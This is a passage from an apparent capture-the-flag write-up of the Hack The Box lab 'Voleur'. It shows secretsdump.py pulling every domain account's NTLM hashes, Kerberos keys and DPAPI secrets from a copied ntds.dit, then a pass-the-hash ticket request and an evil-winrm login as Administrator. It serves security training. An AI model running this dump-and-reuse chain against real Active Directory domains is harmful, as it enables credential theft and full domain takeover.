$ scp -i id_rsa -P 2222 svc_backup@dc.voleur.htb:/home/svc_backup/dpapi_files.tar.gz . && tar -xvf dpapi_files.tar

secretsdump.py

$ secretsdump.py \
  -system SYSTEM \
  -security SECURITY \
  -ntds 'ntds.dit' \
  LOCAL
 
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies
 
[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:759d6c7b27b4c7c4feda8909bc656985b457ea8d7cee9e0be67971bcb648008804103df46ed40750e8d3be1a84b89be42a27e7c0e2d0f6437f8b3044e840735f37ba5359abae5fca8fe78959b667cd5a68f2a569b657ee43f9931e2fff61f9a6f2e239e384ec65e9e64e72c503bd86371ac800eb66d67f1bed955b3cf4fe7c46fca764fb98f5be358b62a9b02057f0eb5a17c1d67170dda9514d11f065accac76de1ccdb1dae5ead8aa58c639b69217c4287f3228a746b4e8fd56aea32e2e8172fbc19d2c8d8b16fc56b469d7b7b94db5cc967b9ea9d76cc7883ff2c854f76918562baacad873958a7964082c58287e2
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77
[*] DPAPI_SYSTEM
dpapi_machinekey:0x5d117895b83add68c59c7c48bb6db5923519f436
dpapi_userkey:0xdce451c1fdc323ee07272945e3e0013d5a07d1c3
[*] NL$KM
 0000   06 6A DC 3B AE F7 34 91  73 0F 6C E0 55 FE A3 FF   .j.;..4.s.l.U...
 0010   30 31 90 0A E7 C6 12 01  08 5A D0 1E A5 BB D2 37   01.......Z.....7
 0020   61 C3 FA 0D AF C9 94 4A  01 75 53 04 46 66 0A AC   a......J.uS.Ff..
 0030   D8 99 1F D3 BE 53 0C CF  6E 2A 4E 74 F2 E9 F2 EB   .....S..n*Nt....
NL$KM:066adc3baef73491730f6ce055fea3ff3031900ae7c61201085ad01ea5bbd23761c3fa0dafc9944a0175530446660aacd8991fd3be530ccf6e2a4e74f2e9f2eb
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
voleur.htb\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::
voleur.htb\marie.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8:::
voleur.htb\lacey.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3:::
voleur.htb\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573:::
voleur.htb\svc_iis:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410:::
voleur.htb\jeremy.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c:::
voleur.htb\svc_winrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e37717757433b4780079ee9b1d421:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:f577668d58955ab962be9a489c032f06d84f3b66cc05de37716cac917acbeebb
Administrator:aes128-cts-hmac-sha1-96:38af4c8667c90d19b286c7af861b10cc
Administrator:des-cbc-md5:459d836b9edcd6b0
DC$:aes256-cts-hmac-sha1-96:65d713fde9ec5e1b1fd9144ebddb43221123c44e00c9dacd8bfc2cc7b00908b7
DC$:aes128-cts-hmac-sha1-96:fa76ee3b2757db16b99ffa087f451782
DC$:des-cbc-md5:64e05b6d1abff1c8
krbtgt:aes256-cts-hmac-sha1-96:2500eceb45dd5d23a2e98487ae528beb0b6f3712f243eeb0134e7d0b5b25b145
krbtgt:aes128-cts-hmac-sha1-96:04e5e22b0af794abb2402c97d535c211
krbtgt:des-cbc-md5:34ae31d073f86d20
voleur.htb\ryan.naylor:aes256-cts-hmac-sha1-96:0923b1bd1e31a3e62bb3a55c74743ae76d27b296220b6899073cc457191fdc74
voleur.htb\ryan.naylor:aes128-cts-hmac-sha1-96:6417577cdfc92003ade09833a87aa2d1
voleur.htb\ryan.naylor:des-cbc-md5:4376f7917a197a5b
voleur.htb\marie.bryant:aes256-cts-hmac-sha1-96:d8cb903cf9da9edd3f7b98cfcdb3d36fc3b5ad8f6f85ba816cc05e8b8795b15d
voleur.htb\marie.bryant:aes128-cts-hmac-sha1-96:a65a1d9383e664e82f74835d5953410f
voleur.htb\marie.bryant:des-cbc-md5:cdf1492604d3a220
voleur.htb\lacey.miller:aes256-cts-hmac-sha1-96:1b71b8173a25092bcd772f41d3a87aec938b319d6168c60fd433be52ee1ad9e9
voleur.htb\lacey.miller:aes128-cts-hmac-sha1-96:aa4ac73ae6f67d1ab538addadef53066
voleur.htb\lacey.miller:des-cbc-md5:6eef922076ba7675
voleur.htb\svc_ldap:aes256-cts-hmac-sha1-96:2f1281f5992200abb7adad44a91fa06e91185adda6d18bac73cbf0b8dfaa5910
voleur.htb\svc_ldap:aes128-cts-hmac-sha1-96:7841f6f3e4fe9fdff6ba8c36e8edb69f
voleur.htb\svc_ldap:des-cbc-md5:1ab0fbfeeaef5776
voleur.htb\svc_backup:aes256-cts-hmac-sha1-96:c0e9b919f92f8d14a7948bf3054a7988d6d01324813a69181cc44bb5d409786f
voleur.htb\svc_backup:aes128-cts-hmac-sha1-96:d6e19577c07b71eb8de65ec051cf4ddd
voleur.htb\svc_backup:des-cbc-md5:7ab513f8ab7f765e
voleur.htb\svc_iis:aes256-cts-hmac-sha1-96:77f1ce6c111fb2e712d814cdf8023f4e9c168841a706acacbaff4c4ecc772258
voleur.htb\svc_iis:aes128-cts-hmac-sha1-96:265363402ca1d4c6bd230f67137c1395
voleur.htb\svc_iis:des-cbc-md5:70ce25431c577f92
voleur.htb\jeremy.combs:aes256-cts-hmac-sha1-96:8bbb5ef576ea115a5d36348f7aa1a5e4ea70f7e74cd77c07aee3e9760557baa0
voleur.htb\jeremy.combs:aes128-cts-hmac-sha1-96:b70ef221c7ea1b59a4cfca2d857f8a27
voleur.htb\jeremy.combs:des-cbc-md5:192f702abff75257
voleur.htb\svc_winrm:aes256-cts-hmac-sha1-96:6285ca8b7770d08d625e437ee8a4e7ee6994eccc579276a24387470eaddce114
voleur.htb\svc_winrm:aes128-cts-hmac-sha1-96:f21998eb094707a8a3bac122cb80b831
voleur.htb\svc_winrm:des-cbc-md5:32b61fb92a7010ab
[*] Cleaning up...

Get admin ticket and connect via realm

$ getTGT.py -dc-ip $IP -hashes :e656e07c56d831611b577b160b259ad2 voleur.htb/administrator
 
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in administrator.ccache
 
$ export KRB5CCNAME=administrator.ccache
 
$ evil-winrm -i DC.voleur.htb -r $IP
 
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ../Desktop
 
 
    Directory: C:\Users\Administrator\Desktop
 
 
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/29/2025   1:12 AM           2308 Microsoft Edge.lnk
-ar---          7/6/2025  12:40 AM             34 root.txt

Home

Explorer

08-Voleur

Enum

Setup /etc/krb5.conf

User

Root

Graph View

Table of Contents